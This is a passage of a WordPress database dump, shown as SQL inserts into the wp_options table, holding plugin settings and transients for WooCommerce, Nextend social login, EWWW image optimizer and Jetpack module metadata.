1053";i:690;s:4:"1052";i:691;s:4:"1051";i:692;s:4:"1050";i:693;s:4:"1049";i:694;s:4:"1048";i:695;s:4:"1047";i:696;s:4:"1046";i:697;s:4:"1044";i:698;s:4:"1043";i:699;s:4:"1041";i:700;s:4:"1040";i:701;s:4:"1039";i:702;s:4:"1038";i:703;s:4:"1037";i:704;s:4:"1036";i:705;s:4:"1034";i:706;s:4:"1032";i:707;s:4:"1030";i:708;s:4:"1029";i:709;s:4:"1028";i:710;s:4:"1027";i:711;s:4:"1026";i:712;s:4:"1025";i:713;s:4:"1024";i:714;s:4:"1023";i:715;s:4:"1022";i:716;s:4:"1021";i:717;s:4:"1020";i:718;s:4:"1018";i:719;s:4:"1017";i:720;s:4:"1000";i:721;s:3:"991";i:722;s:3:"990";i:723;s:3:"988";i:724;s:3:"987";i:725;s:3:"985";i:726;s:3:"983";i:727;s:3:"982";i:728;s:3:"981";i:729;s:3:"980";i:730;s:3:"978";i:731;s:3:"976";i:732;s:3:"975";i:733;s:3:"974";i:734;s:3:"971";i:735;s:3:"969";i:736;s:3:"966";i:737;s:3:"965";i:738;s:3:"964";i:739;s:3:"963";i:740;s:3:"962";i:741;s:3:"961";i:742;s:3:"959";i:743;s:3:"958";i:744;s:3:"957";i:745;s:3:"953";i:746;s:3:"951";i:747;s:3:"950";i:748;s:3:"949";i:749;s:3:"947";i:750;s:3:"946";i:751;s:3:"945";i:752;s:3:"940";i:753;s:3:"938";i:754;s:3:"925";i:755;s:3:"923";i:756;s:3:"919";i:757;s:3:"917";i:758;s:3:"913";i:759;s:3:"911";i:760;s:3:"909";i:761;s:3:"908";i:762;s:3:"907";i:763;s:3:"906";i:764;s:3:"905";i:765;s:3:"904";i:766;s:3:"902";i:767;s:3:"901";i:768;s:3:"899";i:769;s:3:"894";i:770;s:3:"893";i:771;s:3:"892";i:772;s:3:"890";i:773;s:3:"889";i:774;s:3:"886";i:775;s:3:"884";i:776;s:3:"883";i:777;s:3:"879";i:778;s:3:"876";i:779;s:3:"875";i:780;s:3:"874";i:781;s:3:"873";i:782;s:3:"872";i:783;s:3:"871";i:784;s:3:"870";i:785;s:3:"869";i:786;s:3:"867";i:787;s:3:"866";i:788;s:3:"865";i:789;s:3:"863";i:790;s:3:"860";i:791;s:3:"859";i:792;s:3:"854";i:793;s:3:"851";i:794;s:3:"849";i:795;s:3:"845";i:796;s:3:"841";i:797;s:3:"840";i:798;s:3:"839";i:799;s:3:"838";i:800;s:3:"836";i:801;s:3:"834";i:802;s:3:"833";i:803;s:3:"831";i:804;s:3:"829";i:805;s:3:"827";i:806;s:3:"826";i:807;s:3:"825";i:808;s:3:"813";i:809;s:3:"812";i:810;s:3:"811";i:811;s:3:"810";i:812;s:3:"809";i:813;s:3:"808";i:814;s:3:"807";i:815;s:3:"806";i:816;s:3:"805";i:817;s:3:"804";i:818;s:3:"803";i:819;s:3:"802";i:820;s:3:"801";i:821;s:3:"800";i:822;s:3:"799";i:823;s:3:"798";i:824;s:3:"797";i:825;s:3:"796";i:826;s:3:"795";i:827;s:3:"794";i:828;s:3:"793";i:829;s:3:"792";i:830;s:3:"787";i:831;s:3:"786";i:832;s:3:"778";i:833;s:3:"775";i:834;s:3:"774";i:835;s:3:"771";i:836;s:3:"768";i:837;s:3:"767";i:838;s:3:"766";i:839;s:3:"765";i:840;s:3:"764";i:841;s:3:"763";i:842;s:3:"762";i:843;s:3:"761";i:844;s:3:"760";i:845;s:3:"759";i:846;s:3:"758";i:847;s:3:"757";i:848;s:3:"756";i:849;s:3:"755";i:850;s:3:"754";i:851;s:3:"753";i:852;s:3:"752";i:853;s:3:"751";i:854;s:3:"750";i:855;s:3:"749";i:856;s:3:"748";i:857;s:3:"745";i:858;s:3:"744";i:859;s:3:"740";i:860;s:3:"739";i:861;s:3:"731";i:862;s:3:"730";i:863;s:3:"729";i:864;s:3:"728";i:865;s:3:"727";i:866;s:3:"726";i:867;s:3:"725";i:868;s:3:"724";i:869;s:3:"723";i:870;s:3:"722";i:871;s:3:"718";i:872;s:3:"712";i:873;s:3:"711";i:874;s:3:"709";i:875;s:3:"706";i:876;s:3:"705";i:877;s:3:"704";i:878;s:3:"703";i:879;s:3:"702";i:880;s:3:"701";i:881;s:3:"700";i:882;s:3:"699";i:883;s:3:"698";i:884;s:3:"694";i:885;s:3:"693";i:886;s:3:"692";i:887;s:3:"691";i:888;s:3:"690";i:889;s:3:"689";i:890;s:3:"688";i:891;s:3:"687";i:892;s:3:"686";i:893;s:3:"685";i:894;s:3:"684";i:895;s:3:"683";i:896;s:3:"682";i:897;s:3:"681";i:898;s:3:"680";i:899;s:3:"679";i:900;s:3:"678";i:901;s:3:"677";i:902;s:3:"676";i:903;s:3:"630";i:904;s:3:"627";i:905;s:3:"626";i:906;s:3:"624";i:907;s:3:"619";i:908;s:3:"618";i:909;s:3:"616";i:910;s:3:"614";i:911;s:3:"613";i:912;s:3:"610";i:913;s:3:"607";i:914;s:3:"604";i:915;s:3:"602";i:916;s:3:"599";i:917;s:3:"598";i:918;s:3:"596";i:919;s:3:"595";i:920;s:3:"593";i:921;s:3:"584";i:922;s:3:"574";i:923;s:3:"573";i:924;s:3:"572";i:925;s:3:"571";i:926;s:3:"570";i:927;s:3:"569";i:928;s:3:"566";i:929;s:3:"565";i:930;s:3:"555";i:931;s:3:"554";i:932;s:3:"549";i:933;s:3:"546";i:934;s:3:"544";i:935;s:3:"523";i:936;s:3:"517";i:937;s:3:"486";i:938;s:3:"485";i:939;s:3:"466";i:940;s:3:"429";i:941;s:3:"426";i:942;s:3:"424";i:943;s:3:"422";i:944;s:3:"420";i:945;s:3:"401";i:946;s:3:"391";i:947;s:3:"390";i:948;s:3:"389";i:949;s:3:"388";i:950;s:3:"387";i:951;s:3:"386";i:952;s:3:"385";i:953;s:3:"384";i:954;s:3:"383";i:955;s:3:"382";i:956;s:3:"381";i:957;s:3:"380";i:958;s:3:"379";i:959;s:3:"378";i:960;s:3:"377";i:961;s:3:"376";i:962;s:3:"375";i:963;s:3:"374";i:964;s:3:"373";i:965;s:3:"372";i:966;s:3:"371";i:967;s:3:"370";i:968;s:3:"369";i:969;s:3:"368";i:970;s:3:"367";i:971;s:3:"366";i:972;s:3:"365";i:973;s:3:"364";i:974;s:3:"363";i:975;s:3:"361";i:976;s:3:"360";i:977;s:3:"359";i:978;s:3:"358";i:979;s:3:"357";i:980;s:3:"356";i:981;s:3:"355";i:982;s:3:"354";i:983;s:3:"353";i:984;s:3:"352";i:985;s:3:"351";i:986;s:3:"350";i:987;s:3:"349";i:988;s:3:"348";i:989;s:3:"345";i:990;s:3:"344";i:991;s:3:"343";i:992;s:3:"342";i:993;s:3:"341";i:994;s:3:"340";i:995;s:3:"339";i:996;s:3:"338";i:997;s:3:"337";i:998;s:3:"335";i:999;s:3:"334";i:1000;s:3:"333";i:1001;s:3:"332";i:1002;s:3:"331";i:1003;s:3:"330";i:1004;s:3:"329";i:1005;s:3:"328";i:1006;s:3:"327";i:1007;s:3:"326";i:1008;s:3:"325";i:1009;s:3:"324";i:1010;s:3:"323";i:1011;s:3:"322";i:1012;s:3:"321";i:1013;s:3:"320";i:1014;s:3:"311";i:1015;s:3:"298";i:1016;s:3:"296";i:1017;s:3:"294";i:1018;s:3:"291";i:1019;s:3:"289";i:1020;s:3:"267";i:1021;s:3:"264";i:1022;s:3:"260";i:1023;s:3:"259";i:1024;s:3:"258";i:1025;s:3:"257";i:1026;s:3:"256";i:1027;s:3:"255";i:1028;s:3:"254";i:1029;s:3:"253";i:1030;s:3:"252";i:1031;s:3:"251";i:1032;s:3:"250";i:1033;s:3:"249";i:1034;s:3:"247";i:1035;s:3:"246";i:1036;s:3:"245";i:1037;s:3:"244";i:1038;s:3:"243";i:1039;s:3:"242";i:1040;s:3:"241";i:1041;s:3:"240";i:1042;s:3:"239";i:1043;s:3:"238";i:1044;s:3:"237";i:1045;s:3:"233";i:1046;s:3:"218";i:1047;s:3:"211";i:1048;s:3:"210";i:1049;s:3:"209";i:1050;s:3:"207";i:1051;s:3:"201";i:1052;s:3:"200";i:1053;s:3:"191";i:1054;s:3:"183";i:1055;s:3:"181";i:1056;s:3:"163";i:1057;s:3:"144";i:1058;s:3:"143";i:1059;s:3:"142";i:1060;s:3:"141";i:1061;s:3:"140";i:1062;s:3:"139";i:1063;s:3:"138";i:1064;s:3:"137";i:1065;s:3:"136";i:1066;s:2:"91";i:1067;s:2:"90";i:1068;s:2:"89";i:1069;s:2:"88";i:1070;s:2:"87";i:1071;s:2:"86";i:1072;s:2:"85";i:1073;s:2:"84";i:1074;s:2:"83";i:1075;s:2:"82";i:1076;s:2:"81";i:1077;s:2:"80";i:1078;s:2:"79";i:1079;s:2:"78";i:1080;s:2:"77";i:1081;s:2:"76";i:1082;s:2:"75";i:1083;s:2:"63";i:1084;s:2:"62";i:1085;s:2:"61";i:1086;s:2:"60";i:1087;s:2:"59";i:1088;s:2:"58";i:1089;s:2:"57";i:1090;s:2:"56";i:1091;s:2:"55";i:1092;s:2:"54";i:1093;s:2:"53";i:1094;s:2:"52";i:1095;s:2:"51";i:1096;s:2:"50";i:1097;s:2:"49";i:1098;s:2:"48";i:1099;s:2:"47";i:1100;s:2:"46";i:1101;s:2:"44";i:1102;s:2:"43";i:1103;s:2:"42";i:1104;s:2:"41";i:1105;s:2:"40";i:1106;s:2:"39";i:1107;s:2:"38";i:1108;s:2:"37";i:1109;s:2:"36";i:1110;s:2:"35";i:1111;s:2:"34";i:1112;s:2:"33";i:1113;s:2:"32";i:1114;s:2:"31";i:1115;s:2:"30";i:1116;s:2:"29";i:1117;s:2:"28";i:1118;s:2:"27";i:1119;s:2:"26";i:1120;s:2:"25";i:1121;s:2:"24";i:1122;s:2:"18";i:1123;s:2:"17";i:1124;s:2:"16";i:1125;s:2:"15";i:1126;s:2:"14";i:1127;s:2:"13";i:1128;s:2:"12";i:1129;s:2:"11";i:1130;s:2:"10";i:1131;s:1:"9";i:1132;s:1:"8";i:1133;s:1:"7";i:1134;s:1:"6";}', 'no'); 
INSERT INTO `wp_options` VALUES (600101, 'ewww_image_optimizer_bulk_resume', 'scanning', 'yes'); 
INSERT INTO `wp_options` VALUES (600113, 'WpFc_credit', '504', 'no'); 
INSERT INTO `wp_options` VALUES (600136, '_site_transient_timeout_n_nextend586d398b026a40.48223510', '1483556763', 'no'); 
INSERT INTO `wp_options` VALUES (600137, '_site_transient_n_nextend586d398b026a40.48223510', '1', 'no'); 
INSERT INTO `wp_options` VALUES (600138, '_site_transient_timeout_nextend586d398b026a40.48223510_fb_state', '1483556763', 'no'); 
INSERT INTO `wp_options` VALUES (600139, '_site_transient_nextend586d398b026a40.48223510_fb_state', 'd2c7ee8a9bf53b9554e9cbe39566d39a', 'no'); 
INSERT INTO `wp_options` VALUES (600140, '_site_transient_timeout_nextend586d398b026a40.48223510_fb_r', '1483556763', 'no'); 
INSERT INTO `wp_options` VALUES (600141, '_site_transient_nextend586d398b026a40.48223510_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (600142, '_site_transient_timeout_nextend586d398b026a40.48223510_google_r', '1483556764', 'no'); 
INSERT INTO `wp_options` VALUES (600143, '_site_transient_nextend586d398b026a40.48223510_google_r', '', 'no'); 
INSERT INTO `wp_options` VALUES (600182, 'woocommerce_db_version', '2.6.11', 'yes'); 
INSERT INTO `wp_options` VALUES (600184, 'woocommerce_version', '2.6.11', 'yes'); 
INSERT INTO `wp_options` VALUES (600186, '_transient_wc_attribute_taxonomies', 'a:1:{i:0;O:8:"stdClass":6:{s:12:"attribute_id";s:1:"1";s:14:"attribute_name";s:15:"sizes-available";s:15:"attribute_label";s:15:"SIZES AVAILABLE";s:14:"attribute_type";s:4:"text";s:17:"attribute_orderby";s:10:"menu_order";s:16:"attribute_public";s:1:"0";}}', 'yes'); 
INSERT INTO `wp_options` VALUES (600195, '_transient_timeout_jetpack_idc_allowed', '1483557759', 'no'); 
INSERT INTO `wp_options` VALUES (600196, '_transient_jetpack_idc_allowed', '1', 'no'); 
INSERT INTO `wp_options` VALUES (600199, 'jetpack_file_data', 'a:1:{s:5:"4.4.2";a:50:{s:32:"31e5b9ae08b62c2b0cd8a7792242298b";a:14:{s:4:"name";s:20:"Spelling and Grammar";s:11:"description";s:40:"Check your spelling, style, and grammar.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:1:"6";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"1.1";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:7:"Writing";s:7:"feature";s:7:"Writing";s:25:"additional_search_queries";s:115:"after the deadline, afterthedeadline, spell, spellchecker, spelling, grammar, proofreading, style, language, cliche";}s:32:"3f41b2d629265b5de8108b463abbe8e2";a:14:{s:4:"name";s:8:"Carousel";s:11:"description";s:64:"Transform image galleries into gorgeous, full-screen slideshows.";s:14:"jumpstart_desc";s:79:"Brings your photos and images to life as full-size, easily navigable galleries.";s:4:"sort";s:2:"22";s:20:"recommendation_order";s:2:"12";s:10:"introduced";s:3:"1.5";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:2:"No";s:11:"module_tags";s:17:"Photos and Videos";s:7:"feature";s:21:"Appearance, Jumpstart";s:25:"additional_search_queries";s:80:"gallery, carousel, diaporama, slideshow, images, lightbox, exif, metadata, image";}s:32:"c6ebb418dde302de09600a6025370583";a:14:{s:4:"name";s:8:"Comments";s:11:"description";s:65:"Allow comments with WordPress.com, Twitter, Facebook, or Google+.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"20";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"1.4";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:2:"No";s:11:"module_tags";s:6:"Social";s:7:"feature";s:10:"Engagement";s:25:"additional_search_queries";s:53:"comments, comment, facebook, twitter, google+, social";}s:32:"836f9485669e1bbb02920cb474730df0";a:14:{s:4:"name";s:12:"Contact Form";s:11:"description";s:57:"Insert a customizable contact form anywhere on your site.";s:14:"jumpstart_desc";s:111:"Adds a button to your post and page editors, allowing you to build simple forms to help visitors stay in touch.";s:4:"sort";s:2:"15";s:20:"recommendation_order";s:2:"14";s:10:"introduced";s:3:"1.3";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:5:"Other";s:7:"feature";s:18:"Writing, Jumpstart";s:25:"additional_search_queries";s:44:"contact, form, grunion, feedback, submission";}s:32:"ea3970eebf8aac55fc3eca5dca0e0157";a:14:{s:4:"name";s:20:"Custom Content Types";s:11:"description";s:61:"Organize and display different types of content on your site.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"34";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"3.1";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:7:"Writing";s:7:"feature";s:7:"Writing";s:25:"additional_search_queries";s:72:"cpt, custom post types, portfolio, portfolios, testimonial, testimonials";}s:32:"d2bb05ccad3d8789df40ca3abb97336c";a:14:{s:4:"name";s:10:"Custom CSS";s:11:"description";s:53:"Tweak your site’s CSS without modifying your theme.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:1:"2";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"1.7";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:10:"Appearance";s:7:"feature";s:10:"Appearance";s:25:"additional_search_queries";s:108:"css, customize, custom, style, editor, less, sass, preprocessor, font, mobile, appearance, theme, stylesheet";}s:32:"a2064eec5b9c7e0d816af71dee7a715f";a:14:{s:4:"name";s:0:"";s:11:"description";s:0:"";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:0:"";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:0:"";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:0:"";s:13:"auto_activate";s:0:"";s:11:"module_tags";s:0:"";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:0:"";}s:32:"53a4ec755022ef3953699734c343da02";a:14:{s:4:"name";s:21:"Enhanced Distribution";s:11:"description";s:27:"Increase reach and traffic.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:1:"5";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"1.2";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:6:"Public";s:11:"module_tags";s:7:"Writing";s:7:"feature";s:10:"Engagement";s:25:"additional_search_queries";s:54:"google, seo, firehose, search, broadcast, broadcasting";}s:32:"72fecb67ee6704ba0a33e0225316ad06";a:14:{s:4:"name";s:0:"";s:11:"description";s:0:"";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:0:"";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:0:"";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:0:"";s:13:"auto_activate";s:0:"";s:11:"module_tags";s:0:"";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:0:"";}s:32:"d56e2886185a9eace719cc57d46770df";a:14:{s:4:"name";s:19:"Gravatar Hovercards";s:11:"description";s:58:"Enable pop-up business cards over commenters’ Gravatars.";s:14:"jumpstart_desc";s:131:"Let commenters link their profiles to their Gravatar accounts, making it easy for your visitors to learn more about your community.";s:4:"sort";s:2:"11";s:20:"recommendation_order";s:2:"13";s:10:"introduced";s:3:"1.1";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:18:"Social, Appearance";s:7:"feature";s:21:"Appearance, Jumpstart";s:25:"additional_search_queries";s:20:"gravatar, hovercards";}s:32:"e391e760617bd0e0736550e34a73d7fe";a:14:{s:4:"name";s:0:"";s:11:"description";s:0:"";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:0:"";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:8:"2.0.3 ??";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:0:"";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:0:"";}s:32:"2e345370766346c616b3c5046e817720";a:14:{s:4:"name";s:15:"Infinite Scroll";s:11:"description";s:54:"Automatically load new content when a visitor scrolls.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"26";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"2.0";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:2:"No";s:11:"module_tags";s:10:"Appearance";s:7:"feature";s:10:"Appearance";s:25:"additional_search_queries";s:33:"scroll, infinite, infinite scroll";}s:32:"bd69edbf134de5fae8fdcf2e70a45b56";a:14:{s:4:"name";s:8:"JSON API";s:11:"description";s:51:"Allow applications to securely access your content.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"19";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"1.9";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:6:"Public";s:11:"module_tags";s:19:"Writing, Developers";s:7:"feature";s:7:"General";s:25:"additional_search_queries";s:50:"api, rest, develop, developers, json, klout, oauth";}s:32:"8110b7a4423aaa619dfa46b8843e10d1";a:14:{s:4:"name";s:14:"Beautiful Math";s:11:"description";s:57:"Use LaTeX markup for complex equations and other geekery.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"12";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"1.1";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:7:"Writing";s:7:"feature";s:7:"Writing";s:25:"additional_search_queries";s:47:"latex, math, equation, equations, formula, code";}s:32:"fd7e85d3b4887fa6b6f997d6592c1f33";a:14:{s:4:"name";s:5:"Likes";s:11:"description";s:63:"Give visitors an easy way to show they appreciate your content.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"23";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"2.2";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:2:"No";s:11:"module_tags";s:6:"Social";s:7:"feature";s:10:"Engagement";s:25:"additional_search_queries";s:26:"like, likes, wordpress.com";}s:32:"c5dfef41fad5bcdcaae8e315e5cfc420";a:14:{s:4:"name";s:6:"Manage";s:11:"description";s:54:"Manage all of your sites from a centralized dashboard.";s:14:"jumpstart_desc";s:151:"Helps you remotely manage plugins, turn on automated updates, and more from <a href="https://wordpress.com/plugins/" target="_blank">wordpress.com</a>.";s:4:"sort";s:1:"1";s:20:"recommendation_order";s:1:"3";s:10:"introduced";s:3:"3.4";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:35:"Centralized Management, Recommended";s:7:"feature";s:7:"General";s:25:"additional_search_queries";s:26:"manage, management, remote";}s:32:"fd6dc399b92bce76013427e3107c314f";a:14:{s:4:"name";s:8:"Markdown";s:11:"description";s:51:"Write posts or pages in plain-text Markdown syntax.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"31";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"2.8";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:2:"No";s:11:"module_tags";s:7:"Writing";s:7:"feature";s:7:"Writing";s:25:"additional_search_queries";s:12:"md, markdown";}s:32:"c49a35b6482b0426cb07ad28ecf5d7df";a:14:{s:4:"name";s:12:"Mobile Theme";s:11:"description";s:47:"Optimize your site for smartphones and tablets.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"21";s:20:"recommendation_order";s:2:"11";s:10:"introduced";s:3:"1.8";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:2:"No";s:11:"module_tags";s:31:"Appearance, Mobile, Recommended";s:7:"feature";s:10:"Appearance";s:25:"additional_search_queries";s:24:"mobile, theme, minileven";}s:32:"b42e38f6fafd2e4104ebe5bf39b4be47";a:14:{s:4:"name";s:0:"";s:11:"description";s:0:"";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:0:"";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:0:"";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:0:"";s:13:"auto_activate";s:0:"";s:11:"module_tags";s:0:"";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:0:"";}s:32:"771cfeeba0d3d23ec344d5e781fb0ae2";a:14:{s:4:"name";s:0:"";s:11:"description";s:0:"";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:0:"";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:0:"";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:0:"";s:13:"auto_activate";s:0:"";s:11:"module_tags";s:0:"";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:0:"";}s:32:"54f0661d27c814fc8bde39580181d939";a:14:{s:4:"name";s:0:"";s:11:"description";s:0:"";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:0:"";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:0:"";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:0:"";s:13:"auto_activate";s:0:"";s:11:"module_tags";s:0:"";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:0:"";}s:32:"46c4c413b5c72bbd3c3dbd14ff8f8adc";a:14:{s:4:"name";s:0:"";s:11:"description";s:0:"";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:0:"";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:0:"";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:0:"";s:13:"auto_activate";s:0:"";s:11:"module_tags";s:0:"";s:7:"feature";s:0:"";s:25:"additional_search_queries";s:0:"";}s:32:"9ea52fa25783e5ceeb6bfaed3268e64e";a:14:{s:4:"name";s:7:"Monitor";s:11:"description";s:61:"Receive immediate notifications if your site goes down, 24/7.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"28";s:20:"recommendation_order";s:2:"10";s:10:"introduced";s:3:"2.6";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:2:"No";s:11:"module_tags";s:11:"Recommended";s:7:"feature";s:8:"Security";s:25:"additional_search_queries";s:37:"monitor, uptime, downtime, monitoring";}s:32:"cfcaafd0fcad087899d715e0b877474d";a:14:{s:4:"name";s:13:"Notifications";s:11:"description";s:57:"Receive instant notifications of site comments and likes.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"13";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"1.9";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:5:"Other";s:7:"feature";s:7:"General";s:25:"additional_search_queries";s:62:"notification, notifications, toolbar, adminbar, push, comments";}s:32:"0d18bfa69bec61550c1d813ce64149b0";a:14:{s:4:"name";s:10:"Omnisearch";s:11:"description";s:66:"Search your entire database from a single field in your dashboard.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"16";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"2.3";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:2:"No";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:10:"Developers";s:7:"feature";s:7:"General";s:25:"additional_search_queries";s:6:"search";}s:32:"3f0a11e23118f0788d424b646a6d465f";a:14:{s:4:"name";s:6:"Photon";s:11:"description";s:27:"Speed up images and photos.";s:14:"jumpstart_desc";s:141:"Mirrors and serves your images from our free and fast image CDN, improving your site’s performance with no additional load on your servers.";s:4:"sort";s:2:"25";s:20:"recommendation_order";s:1:"1";s:10:"introduced";s:3:"2.0";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:2:"No";s:11:"module_tags";s:42:"Photos and Videos, Appearance, Recommended";s:7:"feature";s:34:"Recommended, Jumpstart, Appearance";s:25:"additional_search_queries";s:38:"photon, image, cdn, performance, speed";}s:32:"e37cfbcb72323fb1fe8255a2edb4d738";a:14:{s:4:"name";s:13:"Post by Email";s:11:"description";s:34:"Publish posts by sending an email.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"14";s:20:"recommendation_order";s:0:"";s:10:"introduced";s:3:"2.0";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:7:"Writing";s:7:"feature";s:7:"Writing";s:25:"additional_search_queries";s:20:"post by email, email";}s:32:"728290d131a480bfe7b9e405d7cd925f";a:14:{s:4:"name";s:7:"Protect";s:11:"description";s:43:"Prevent and block malicious login attempts.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:1:"1";s:20:"recommendation_order";s:1:"4";s:10:"introduced";s:3:"3.4";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:11:"Recommended";s:7:"feature";s:8:"Security";s:25:"additional_search_queries";s:65:"security, secure, protection, botnet, brute force, protect, login";}s:32:"f9ce784babbbf4dcca99b8cd2ceb420c";a:14:{s:4:"name";s:9:"Publicize";s:11:"description";s:27:"Automated social marketing.";s:14:"jumpstart_desc";s:0:"";s:4:"sort";s:2:"10";s:20:"recommendation_order";s:1:"7";s:10:"introduced";s:3:"2.0";s:7:"changed";s:0:"";s:10:"deactivate";s:0:"";s:4:"free";s:0:"";s:19:"requires_connection";s:3:"Yes";s:13:"auto_activate";s:3:"Yes";s:11:"module_tags";s:19:"Social, Recommended";s:7:"feature";s:10:"Engagement";s:25:"additional_search_queries";s:107:"facebook, twitter, google+, googleplus, google, path, tumblr, linkedin, social, tweet, connections, 